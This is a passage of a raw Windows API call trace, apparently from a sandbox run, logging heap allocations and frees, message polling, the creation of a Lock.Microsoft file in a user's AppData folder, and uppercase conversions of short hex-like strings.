(in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0244.487] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0244.488] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0244.489] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0244.490] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0244.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.490] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0244.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0244.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.490] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0244.491] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Microsoft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0244.491] GetLastError () returned 0x5 [0244.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0244.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.492] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0244.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0244.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0244.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0244.492] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0244.493] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Microsoft" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0244.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0244.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0244.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0244.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0244.494] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.494] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0244.495] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0244.495] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0244.495] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0244.495] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0244.495] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.495] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.496] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.496] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.496] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.496] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.496] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.496] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0244.496] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0244.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.497] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0244.497] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.497] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0244.497] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0244.497] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0244.497] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0244.497] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.497] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0244.498] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.498] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0244.498] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0244.498] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0244.498] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0244.498] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.498] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0244.499] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0244.499] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0244.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0244.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0244.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.499] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0244.500] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0244.500] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0244.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0244.500] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0244.500] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0244.500] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 